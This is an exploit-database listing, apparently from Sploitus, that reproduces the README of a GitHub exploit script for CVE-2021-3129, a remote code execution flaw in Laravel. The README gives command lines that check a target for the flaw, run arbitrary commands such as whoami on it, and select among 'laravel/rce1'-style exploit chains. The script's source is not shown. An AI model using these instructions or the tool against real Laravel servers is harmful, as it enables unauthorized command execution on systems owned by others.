Sploitus

Exploit for CVE-2021-3129

githubexploit · 2024-01-15

Exploit Code

README14 lines
## https://sploitus.com/exploit?id=F87C6B04-4AFB-5235-8E72-31C29A8028B5
## CVE-2021-3129

**Instructions:**

Note: A PHP environment is required locally.

```
python3 CVE-2021-3129.py -u http://127.0.0.1:80 (Only checks POC)
python3 CVE-2021-3129.py -u http://127.0.0.1:80 -c whoami (Executes the command; by default, it will traverse all exploit chains)
python3 CVE-2021-3129.py -u http://127.0.0.1:80 -c whoami -chain laravel/rce1 (If an exploit chain is found, you can directly select it)
```

![20240115-145801@2x](20240115-150156@2x.png)